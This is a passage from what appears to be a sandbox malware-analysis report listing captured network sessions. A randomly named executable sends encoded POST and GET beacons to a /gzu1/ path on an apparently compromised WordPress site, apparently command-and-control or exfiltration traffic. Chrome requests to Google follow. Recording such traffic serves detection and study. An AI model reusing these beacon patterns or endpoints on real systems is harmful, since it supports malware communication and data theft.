6c 6e 74 65 57 34 41 51 46 77 3d 3d Data Ascii: 7Br4wVx=ObiHeMyysX7xoSKa1Xj24j6k5jPwLm5xRbGYsxPo6eEgKgSsmCySaYnmAmW890L9XhAdvBC5Xki2d96PhjyD6JG6lWhOcNYj9akhltqkzEtCmnysYJ6EEiE+T8trVehL5Fxpcg/dxLaawjmSgI2B3d3jjMDAbMWyrIILVTGSu2rmsS6G3m8+KouhlnteW4AQFw==
May 2, 2024 15:09:59.240658998 CEST	1289	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Thu, 02 May 2024 13:09:58 GMT Server: Apache X-Powered-By: PHP/8.2.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://wrgardenrooms.co.uk/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip Data Raw: 34 35 35 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 93 db 36 b2 ef df 76 d5 fd 0e b0 5c eb 91 12 51 ef c7 8c c6 9a dd c4 8f c4 e7 24 71 ae 9d 9c d4 b9 b1 6b 8a 92 a8 91 6c 49 d4 92 d4 3c 32 3b df fd fe ba 01 90 20 09 49 9c 87 b3 bb a7 ce 24 9e 91 48 a0 bb d1 68 34 1a dd 0d e0 f9 93 97 6f 5f fc f2 df 3f bf 12 b3 68 b9 38 79 fc 9c fe 88 c9 3c 18 96 16 51 50 12 0b 77 75 36 2c 79 2b e7 bb 6f 4b 62 1d 78 d3 f9 e5 b0 e4 9f 0d 50 3c 5a 87 83 7a dd 3f 5b d7 96 5e 7d 15 3e 2d 51 6d cf 9d 9c 3c 7e f4 7c e9 45 ae 18 cf dc 20 f4 a2 61 e9 d7 5f 5e 3b 87 25 51 8f df ac dc a5 37 2c 9d cf bd 8b b5 1f 44 25 31 f6 57 91 b7 42 c9 8b f9 24 9a 0d 27 de f9 7c ec 39 fc a5 2a e6 ab 79 34 77 17 4e 38 76 17 de b0 29 e1 3c 7a f4 3c 8c ae 16 de c9 23 f5 f3 98 ff 4e fd 60 f9 34 8c e6 e3 cf 57 de c2 5b 02 66 e8 d0 33 00 59 6f a2 c1 c0 59 fa 7f 38 eb 85 3b f6 66 fe 62 e2 05 d7 b2 da a3 b1 bf f0 83 81 78 da 79 4d ff 1d cb a7 37 a2 28 d0 d0 61 f8 fb 21 33 91 85 e1 5e 78 a3 cf f3 e8 76 b0 8b 91 bc 97 05 92 d0 3d c0 22 ef 32 72 [TRUNCATED] Data Ascii: 4557}{6v\Q$qklI<2; I$Hh4o_?h8y<QPwu6,y+oKbxP<Zz?[^}>-Qm<~\|E a_^;%Q7,D%1WB$'\|9y4wN8v)<z<#N`4W[f3YoY8;fbxyM7(a!3^xv="2rx[v^Jf{q7z^]yS#z~m/#KOXBCLW\|5.(Eu7o$G\|j\|)Wpxt1eTPPEj~pVvYi;]7yQDP&en6?4YsyKJz"xJ UbfD}Z"{EdIiX`?xoVPz>7a!\|4i\|Z`)hYGX+a`Q/Yg'oL2VQC}^$Po5ZFCS&h$?si"_P?4hu{jif]VGM6@!)&yO:JF7^ur*G.>PcDuP]
May 2, 2024 15:09:59.240700960 CEST	1289	IN	Data Raw: 68 48 d2 3d 2f cc e7 d5 52 84 79 73 3d f3 57 34 d4 be ee 74 fa fd 4e ab df eb f7 fb 5d 20 57 20 7e 91 ea e3 3d a6 e3 b0 74 63 4a e1 6f de e8 67 e2 cc 2d 54 09 e6 b8 b5 ac 52 44 32 68 6c 01 fa 7c f5 03 ec 92 0d 77 82 32 4e f0 30 fc d9 0d a2 b7 d3 Data Ascii: hH=/Rys=W4tN] W ~=tcJog-TRD2hl\|w2N0P/^(mz0/jb@;\E+7~w=#y>wE4)"_1@Q<w7Wg"\CZoF3/(0}Y4f\|L?~>
May 2, 2024 15:09:59.240772963 CEST	1289	IN	Data Raw: 06 26 42 03 3f 69 54 e7 35 72 16 d6 e0 ea f0 56 93 17 b3 f9 62 82 81 75 63 63 f3 cf 81 bf 9c 87 60 6e d9 87 87 70 fd ca 9c d4 de 4b 5d 8b e5 69 38 fc 5d 8e c8 6a 49 4a c5 c7 ea aa a6 54 71 38 bc e6 31 8f b9 7e 75 06 16 55 93 6f af 2e c7 de 3a 7a Data Ascii: &B?iT5rVbucc`npK]i8]jIJTq81~uUo.:zLz5w2yu.?<?r>QgAVYsZyfTrkGp76uO?{I{a09<UL=5&'7M}h:.3P~}
May 2, 2024 15:09:59.240859032 CEST	1289	IN	Data Raw: cb 73 c2 cd f4 39 ad 2e 56 b6 70 59 0d b8 f7 5a dd bf c0 0f 0c c3 a7 ec 38 a8 a0 26 1e 65 0f 9c b9 eb aa a8 41 bd 55 be aa f5 bb 95 22 bc da 82 b4 db 30 91 76 1b 05 91 de 0b 67 3f d5 d0 7e d1 86 b6 ee 85 14 13 05 66 19 ef d2 81 2f 78 1e b2 f1 a1 Data Ascii: s9.VpYZ8&eAU"0vg?~f/xm\a^xp3B^S2 @A0L%z%fNmxeVt0ee!?/LSP2niFdlJ%s2QB1jZihs\|-lKe]-'{oPJzAf?~
May 2, 2024 15:09:59.240947008 CEST	1289	IN	Data Raw: 2a 5f 78 cb 75 74 25 54 61 4e 3d 57 f8 d2 40 fd d5 e2 aa 2a b0 db 67 3c e3 9c e5 95 f8 a6 d9 fc 6f 7c 0c 37 1e a5 2c 13 35 16 99 61 e8 db 24 87 03 69 66 73 2c 00 78 53 26 21 77 78 a7 11 1b c9 f7 80 c7 f3 8e 31 f2 a4 35 9c 01 a8 56 87 08 5c 73 c2 Data Ascii: _xut%TaN=W@g<o\|7,5a$ifs,xS&!wx15V\snyZH&s-z;\2xB>D8;0Si%7co"\|J(ay-E)uz"lKzwgZY>0qlw;kOCx<=<&nXN[E&II
May 2, 2024 15:09:59.241036892 CEST	1289	IN	Data Raw: 50 12 7f ba 9e 96 3e 39 9d 0c 84 d3 e0 2d 2d e9 42 c9 88 19 d8 a8 d2 3e 11 f8 13 53 f5 b6 f2 55 9a 5d 8b f9 28 70 83 ab b4 a9 39 c0 11 39 d1 35 27 a5 bb 13 1a 69 f0 fc 2e b1 65 8d cf 12 7c da 68 f4 c7 23 f7 d8 fe da 71 82 b3 d1 00 9b be 5b 9d 6a Data Ascii: P>9--B>SU](p995'i.e\|h#q[jN1m-n-u{nwjr~e~fLm%fZFTbQNG:Nnj&y:Eb#::mgqrdpG
May 2, 2024 15:09:59.241132975 CEST	1289	IN	Data Raw: eb 2a 78 27 dc 72 af da ec f4 b1 08 87 27 a1 22 b0 f2 c1 c3 72 b3 db ad c2 62 c6 39 d8 15 4a a8 80 19 92 16 93 04 b5 5e 49 ea 6e 4f 16 7d 66 df 6e c7 5f 26 1f 40 ab 05 77 c3 61 23 46 0f 9f 40 e3 10 0e 08 3c d9 83 3d 2d db 2c a7 44 41 46 7e b5 cc Data Ascii: *x'r'"rb9J^InO}fn_&@wa#F@<=-,DAF~o'--?"f=VVH7xoR{u-z$i;r}XUNh8^0rqGD[W$`_+fGuQELPv@GO?8A>&(2
May 2, 2024 15:09:59.241189957 CEST	1289	IN	Data Raw: 28 0a 24 ef 29 a6 92 ee 93 4a 9c a6 a8 4e 41 a0 18 60 ee e1 59 30 9f a0 a7 4e 74 f2 bc f6 94 e3 f4 74 95 47 52 fa 28 01 c5 fd 21 61 c4 05 4f 4f 4b d8 63 be c6 76 75 6c 34 af ce da d5 59 a7 3a eb 56 67 bd ea 66 51 f5 17 16 29 28 d4 75 59 49 d9 53 Data Ascii: ($)JNA`Y0NttGR(!aOOKcvul4Y:VgfQ)(uYISnrKOmCd6J~j? [,Qj05@b7.ldX7`$2(DOU#2^1wFtGHMs;S(44{%G>?eATrT$G&Msq6
May 2, 2024 15:09:59.241234064 CEST	1289	IN	Data Raw: f1 bd 98 9b 05 66 c1 97 56 d2 f7 c2 96 06 65 c1 95 d1 dc f7 42 96 81 b5 15 9b 9a 05 ee d3 6b 12 d5 ee b9 e1 3e f0 f7 cf 18 f7 81 ae 75 3f 8c e0 bc de 8e 5f 3e 04 06 0b 7c 39 61 dc ab a3 f7 cd 39 c6 0e 4a 7d 4c 1a ab 96 1d 3a a7 f8 5c 73 07 e0 c5 Data Ascii: fVeBk>u?_>\|9a9J}L:\s;/0j9\r,U.iSs;.sJ\|C/#$c+=7[{;-0jwlwUgz62gMh6?ZZ]'$hY#_nBR6n~
May 2, 2024 15:09:59.241307974 CEST	1289	IN	Data Raw: cd 5d 86 46 19 96 3c de 75 a8 ee 8c b1 78 28 e2 01 d7 6b 54 ec 87 e2 8e 71 b5 b8 1e cd 9b f5 da 0f a0 a6 d5 9e d9 71 18 1e 9c f0 f4 4b 2a 87 76 2e 07 50 e5 28 8e 3b 9f 36 38 85 38 5e 51 34 49 2c f6 95 31 f6 e5 69 7c bc a1 db a2 3d d4 c8 de 07 b1 Data Ascii: ]F<ux(kTqqKv.P(;688^Q4I,1i\|=CcXZp*@_7LPRf`ha@9[M@O/[O")K<wHOt$9x)20'KP_\XNa0D]Gfut?/Gr
May 2, 2024 15:09:59.414472103 CEST	1289	IN	Data Raw: 00 74 f8 5b f8 a1 8e 21 06 de d3 b9 32 f3 e8 aa 34 90 d2 f2 a1 fe c1 66 71 e2 21 a0 aa d1 f3 01 c3 e7 43 9d 1a 95 01 62 36 43 f6 9d bc 1b cf 4a f5 d2 9f 6c 16 5e e9 56 c3 96 97 03 61 3d f1 5d d4 cf e7 de 45 1e 2d f3 21 69 6b 5d 06 be d5 55 eb 46 Data Ascii: t[!24fq!Cb6CJl^Va=]E-!ik]UFu*Gadl`I\q7D:;>'jN%jIc1\|'"z>Y).&wX&/R<%4<GI:T8t`fy5>&u1,(5tx#HXxu1'6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49775	217.160.0.13	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:10:01.385590076 CEST	702	OUT	POST /gzu1/ HTTP/1.1 Host: www.wrgardenrooms.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 224 Origin: http://www.wrgardenrooms.co.uk Referer: http://www.wrgardenrooms.co.uk/gzu1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Data Raw: 37 42 72 34 77 56 78 3d 4f 62 69 48 65 4d 79 79 73 58 37 78 70 7a 36 61 7a 77 33 32 2f 44 36 6a 30 7a 50 77 41 47 35 31 52 62 61 59 73 31 2f 34 36 74 77 67 4b 42 69 73 6e 41 57 53 64 59 6e 6d 4c 47 57 7a 33 55 4c 69 58 68 4e 39 76 42 4f 35 58 6c 47 32 64 39 4b 50 69 55 6d 41 37 5a 47 34 70 32 68 49 53 74 59 6a 39 61 6b 68 6c 75 57 43 7a 48 64 43 6d 58 69 73 5a 6f 36 48 61 79 45 39 51 38 74 72 52 65 68 50 35 46 77 47 63 67 50 37 78 4a 69 61 77 68 4f 53 6b 4a 32 43 39 64 33 6c 39 38 43 41 49 4d 72 49 71 4c 31 4b 53 69 33 77 74 30 33 2f 67 30 72 63 6d 58 64 70 59 6f 4b 53 34 67 6b 71 62 37 39 5a 65 32 65 4c 4b 75 4d 41 72 47 4f 35 31 66 34 69 6c 45 64 45 79 4f 45 3d Data Ascii: 7Br4wVx=ObiHeMyysX7xpz6azw32/D6j0zPwAG51RbaYs1/46twgKBisnAWSdYnmLGWz3ULiXhN9vBO5XlG2d9KPiUmA7ZG4p2hIStYj9akhluWCzHdCmXisZo6HayE9Q8trRehP5FwGcgP7xJiawhOSkJ2C9d3l98CAIMrIqL1KSi3wt03/g0rcmXdpYoKS4gkqb79Ze2eLKuMArGO51f4ilEdEyOE=
May 2, 2024 15:10:01.917855024 CEST	1289	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Thu, 02 May 2024 13:10:01 GMT Server: Apache X-Powered-By: PHP/8.2.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://wrgardenrooms.co.uk/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip Data Raw: 34 35 34 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7b 93 db 36 b2 ef df 76 d5 fd 0e b0 5c eb 91 12 51 ef c7 8c c6 9a dd c4 8f c4 e7 24 71 ae 9d 9c d4 b9 b1 6b 8a 92 a8 91 6c 49 d4 92 d4 3c 32 3b df fd fe ba 01 90 20 09 49 9c 87 b3 bb a7 ce 24 9e 91 48 a0 bb d1 68 34 1a dd 0d e0 f9 93 97 6f 5f fc f2 df 3f bf 12 b3 68 b9 38 79 fc 9c fe 88 c9 3c 18 96 16 51 50 12 0b 77 75 36 2c 79 2b e7 bb 6f 4b 62 1d 78 d3 f9 e5 b0 e4 9f 0d 50 3c 5a 87 83 7a dd 3f 5b d7 96 5e 7d 15 3e 2d 51 6d cf 9d 9c 3c 7e f4 7c e9 45 ae 18 cf dc 20 f4 a2 61 e9 d7 5f 5e 3b 87 25 51 8f df ac dc a5 37 2c 9d cf bd 8b b5 1f 44 25 31 f6 57 91 b7 42 c9 8b f9 24 9a 0d 27 de f9 7c ec 39 fc a5 2a e6 ab 79 34 77 17 4e 38 76 17 de b0 29 e1 3c 7a f4 3c 8c ae 16 de c9 23 f5 f3 98 ff 4e fd 60 f9 34 8c e6 e3 cf 57 de c2 5b 02 66 e8 d0 33 00 59 6f a2 c1 c0 59 fa 7f 38 eb 85 3b f6 66 fe 62 e2 05 d7 b2 da a3 b1 bf f0 83 81 78 da 79 4d ff 1d cb a7 37 a2 28 d0 d0 61 f8 fb 21 33 91 85 e1 5e 78 a3 cf f3 e8 76 b0 8b 91 bc 97 05 92 d0 3d c0 22 ef 32 72 [TRUNCATED] Data Ascii: 454f}{6v\Q$qklI<2; I$Hh4o_?h8y<QPwu6,y+oKbxP<Zz?[^}>-Qm<~\|E a_^;%Q7,D%1WB$'\|9y4wN8v)<z<#N`4W[f3YoY8;fbxyM7(a!3^xv="2rx[v^Jf{q7z^]yS#z~m/#KOXBCLW\|5.(Eu7o$G\|j\|)Wpxt1eTPPEj~pVvYi;]7yQDP&en6?4YsyKJz"xJ UbfD}Z"{EdIiX`?xoVPz>7a!\|4i\|Z`)hYGX+a`Q/Yg'oL2VQC}^$Po5ZFCS&h$?si"_P?4hu{jif]VGM6@!)&yO:JF7^ur*G.>PcDuP]
May 2, 2024 15:10:01.917882919 CEST	1289	IN	Data Raw: 68 48 d2 3d 2f cc e7 d5 52 84 79 73 3d f3 57 34 d4 be ee 74 fa fd 4e ab df eb f7 fb 5d 20 57 20 7e 91 ea e3 3d a6 e3 b0 74 63 4a e1 6f de e8 67 e2 cc 2d 54 09 e6 b8 b5 ac 52 44 32 68 6c 01 fa 7c f5 03 ec 92 0d 77 82 32 4e f0 30 fc d9 0d a2 b7 d3 Data Ascii: hH=/Rys=W4tN] W ~=tcJog-TRD2hl\|w2N0P/^(mz0/jb@;\E+7~w=#y>wE4)"_1@Q<w7Wg"\CZoF3/(0}Y4f\|L?~>
May 2, 2024 15:10:01.917896032 CEST	1289	IN	Data Raw: 06 26 42 03 3f 69 54 e7 35 72 16 d6 e0 ea f0 56 93 17 b3 f9 62 82 81 75 63 63 f3 cf 81 bf 9c 87 60 6e d9 87 87 70 fd ca 9c d4 de 4b 5d 8b e5 69 38 fc 5d 8e c8 6a 49 4a c5 c7 ea aa a6 54 71 38 bc e6 31 8f b9 7e 75 06 16 55 93 6f af 2e c7 de 3a 7a Data Ascii: &B?iT5rVbucc`npK]i8]jIJTq81~uUo.:zLz5w2yu.?<?r>QgAVYsZyfTrkGp76uO?{I{a09<UL=5&'7M}h:.3P~}
May 2, 2024 15:10:01.917941093 CEST	1289	IN	Data Raw: cb 73 c2 cd f4 39 ad 2e 56 b6 70 59 0d b8 f7 5a dd bf c0 0f 0c c3 a7 ec 38 a8 a0 26 1e 65 0f 9c b9 eb aa a8 41 bd 55 be aa f5 bb 95 22 bc da 82 b4 db 30 91 76 1b 05 91 de 0b 67 3f d5 d0 7e d1 86 b6 ee 85 14 13 05 66 19 ef d2 81 2f 78 1e b2 f1 a1 Data Ascii: s9.VpYZ8&eAU"0vg?~f/xm\a^xp3B^S2 @A0L%z%fNmxeVt0ee!?/LSP2niFdlJ%s2QB1jZihs\|-lKe]-'{oPJzAf?~
May 2, 2024 15:10:01.918023109 CEST	1289	IN	Data Raw: 2a 5f 78 cb 75 74 25 54 61 4e 3d 57 f8 d2 40 fd d5 e2 aa 2a b0 db 67 3c e3 9c e5 95 f8 a6 d9 fc 6f 7c 0c 37 1e a5 2c 13 35 16 99 61 e8 db 24 87 03 69 66 73 2c 00 78 53 26 21 77 78 a7 11 1b c9 f7 80 c7 f3 8e 31 f2 a4 35 9c 01 a8 56 87 08 5c 73 c2 Data Ascii: _xut%TaN=W@g<o\|7,5a$ifs,xS&!wx15V\snyZH&s-z;\2xB>D8;0Si%7co"\|J(ay-E)uz"lKzwgZY>0qlw;kOCx<=<&nXN[E&II
May 2, 2024 15:10:01.918113947 CEST	1289	IN	Data Raw: 50 12 7f ba 9e 96 3e 39 9d 0c 84 d3 e0 2d 2d e9 42 c9 88 19 d8 a8 d2 3e 11 f8 13 53 f5 b6 f2 55 9a 5d 8b f9 28 70 83 ab b4 a9 39 c0 11 39 d1 35 27 a5 bb 13 1a 69 f0 fc 2e b1 65 8d cf 12 7c da 68 f4 c7 23 f7 d8 fe da 71 82 b3 d1 00 9b be 5b 9d 6a Data Ascii: P>9--B>SU](p995'i.e\|h#q[jN1m-n-u{nwjr~e~fLm%fZFTbQNG:Nnj&y:Eb#::mgqrdpG
May 2, 2024 15:10:01.918199062 CEST	1289	IN	Data Raw: eb 2a 78 27 dc 72 af da ec f4 b1 08 87 27 a1 22 b0 f2 c1 c3 72 b3 db ad c2 62 c6 39 d8 15 4a a8 80 19 92 16 93 04 b5 5e 49 ea 6e 4f 16 7d 66 df 6e c7 5f 26 1f 40 ab 05 77 c3 61 23 46 0f 9f 40 e3 10 0e 08 3c d9 83 3d 2d db 2c a7 44 41 46 7e b5 cc Data Ascii: *x'r'"rb9J^InO}fn_&@wa#F@<=-,DAF~o'--?"f=VVH7xoR{u-z$i;r}XUNh8^0rqGD[W$`_+fGuQELPv@GO?8A>&(2
May 2, 2024 15:10:01.918314934 CEST	1289	IN	Data Raw: 28 0a 24 ef 29 a6 92 ee 93 4a 9c a6 a8 4e 41 a0 18 60 ee e1 59 30 9f a0 a7 4e 74 f2 bc f6 94 e3 f4 74 95 47 52 fa 28 01 c5 fd 21 61 c4 05 4f 4f 4b d8 63 be c6 76 75 6c 34 af ce da d5 59 a7 3a eb 56 67 bd ea 66 51 f5 17 16 29 28 d4 75 59 49 d9 53 Data Ascii: ($)JNA`Y0NttGR(!aOOKcvul4Y:VgfQ)(uYISnrKOmCd6J~j? [,Qj05@b7.ldX7`$2(DOU#2^1wFtGHMs;S(44{%G>?eATrT$G&Msq6
May 2, 2024 15:10:01.918370008 CEST	1289	IN	Data Raw: f1 bd 98 9b 05 66 c1 97 56 d2 f7 c2 96 06 65 c1 95 d1 dc f7 42 96 81 b5 15 9b 9a 05 ee d3 6b 12 d5 ee b9 e1 3e f0 f7 cf 18 f7 81 ae 75 3f 8c e0 bc de 8e 5f 3e 04 06 0b 7c 39 61 dc ab a3 f7 cd 39 c6 0e 4a 7d 4c 1a ab 96 1d 3a a7 f8 5c 73 07 e0 c5 Data Ascii: fVeBk>u?_>\|9a9J}L:\s;/0j9\r,U.iSs;.sJ\|C/#$c+=7[{;-0jwlwUgz62gMh6?ZZ]'$hY#_nBR6n~
May 2, 2024 15:10:01.918457031 CEST	1289	IN	Data Raw: cd 5d 86 46 19 96 3c de 75 a8 ee 8c b1 78 28 e2 01 d7 6b 54 ec 87 e2 8e 71 b5 b8 1e cd 9b f5 da 0f a0 a6 d5 9e d9 71 18 1e 9c f0 f4 4b 2a 87 76 2e 07 50 e5 28 8e 3b 9f 36 38 85 38 5e 51 34 49 2c f6 95 31 f6 e5 69 7c bc a1 db a2 3d d4 c8 de 07 b1 Data Ascii: ]F<ux(kTqqKv.P(;688^Q4I,1i\|=CcXZp*@_7LPRf`ha@9[M@O/[O")K<wHOt$9x)20'KP_\XNa0D]Gfut?/Gr
May 2, 2024 15:10:02.089350939 CEST	1289	IN	Data Raw: 00 74 f8 5b f8 a1 8e 21 06 de d3 b9 32 f3 e8 aa 34 90 d2 f2 a1 fe c1 66 71 e2 21 a0 aa d1 f3 01 c3 e7 43 9d 1a 95 01 62 36 43 f6 9d bc 1b cf 4a f5 d2 9f 6c 16 5e e9 56 c3 96 97 03 61 3d f1 5d d4 cf e7 de 45 1e 2d f3 21 69 6b 5d 06 be d5 55 eb 46 Data Ascii: t[!24fq!Cb6CJl^Va=]E-!ik]UFu*Gadl`I\q7D:;>'jN%jIc1\|'"z>Y).&wX&/R<%4<GI:T8t`fy5>&u1,(5tx#HXxu1'6

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	49776	217.160.0.13	80

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:10:05.320817947 CEST	396	OUT	GET /gzu1/?7Br4wVx=DZKnd6OrhyjSh2P2xCOvgjG8rz+hGzA4eaP9rB/8/NwqVRaBiTGrNKLJLz7ywVDYeyRbngiLRWWycf7Qti6/6bHZgHdFcdMy6ZljqO/4pGth4X6Se5W+Nzg=&Y0H=66WP HTTP/1.1 Host: www.wrgardenrooms.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
May 2, 2024 15:10:05.641791105 CEST	506	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Thu, 02 May 2024 13:10:05 GMT Server: Apache X-Powered-By: PHP/8.2.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://wrgardenrooms.co.uk/gzu1/?7Br4wVx=DZKnd6OrhyjSh2P2xCOvgjG8rz+hGzA4eaP9rB/8/NwqVRaBiTGrNKLJLz7ywVDYeyRbngiLRWWycf7Qti6/6bHZgHdFcdMy6ZljqO/4pGth4X6Se5W+Nzg=&Y0H=66WP Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	142.251.32.100	443	7504	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 13:05:58 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-02 13:05:58 UTC	1191	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 13:05:58 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-DhmnejhkWX4EOQQwB1Y2dw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-05-02 13:05:58 UTC	64	IN	Data Raw: 33 30 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 68 65 6c 6c 64 69 76 65 72 73 20 70 61 74 63 68 20 6e 6f 74 65 73 22 2c 22 6b 65 6e 74 75 63 6b 79 20 64 65 72 62 79 20 32 30 32 34 20 68 6f 72 Data Ascii: 305)]}'["",["helldivers patch notes","kentucky derby 2024 hor
2024-05-02 13:05:58 UTC	716	IN	Data Raw: 73 65 73 22 2c 22 70 73 20 70 6c 75 73 20 6d 6f 6e 74 68 6c 79 20 67 61 6d 65 73 22 2c 22 66 75 62 6f 20 64 69 73 63 6f 76 65 72 79 20 6e 65 74 77 6f 72 6b 73 22 2c 22 6c 6f 74 74 65 72 79 20 70 6f 77 65 72 62 61 6c 6c 20 6a 61 63 6b 70 6f 74 22 2c 22 6d 69 63 68 69 67 61 6e 20 77 6f 6c 76 65 72 69 6e 65 73 20 66 6f 6f 74 62 61 6c 6c 22 2c 22 73 6f 75 74 68 77 65 73 74 20 61 69 72 6c 69 6e 65 73 20 66 6c 69 67 68 74 73 22 2c 22 6e 79 74 20 63 72 6f 73 73 77 6f 72 64 20 63 6c 75 65 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 Data Ascii: ses","ps plus monthly games","fubo discovery networks","lottery powerball jackpot","michigan wolverines football","southwest airlines flights","nyt crossword clues"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:group
2024-05-02 13:05:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	142.251.32.100	443	7504	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 13:05:58 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-02 13:05:59 UTC	1331	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGLafzrEGIjBT_EUKA1u8_t9vjN9UnmJR1K8IADZGF2jLdWpWbLfOyPU11p8YoYWauUFitc_MPvgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIt5_OsQYQ472OrQESBL9gluE Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Thu, 02 May 2024 13:05:59 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-05-02-13; expires=Sat, 01-Jun-2024 13:05:59 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: 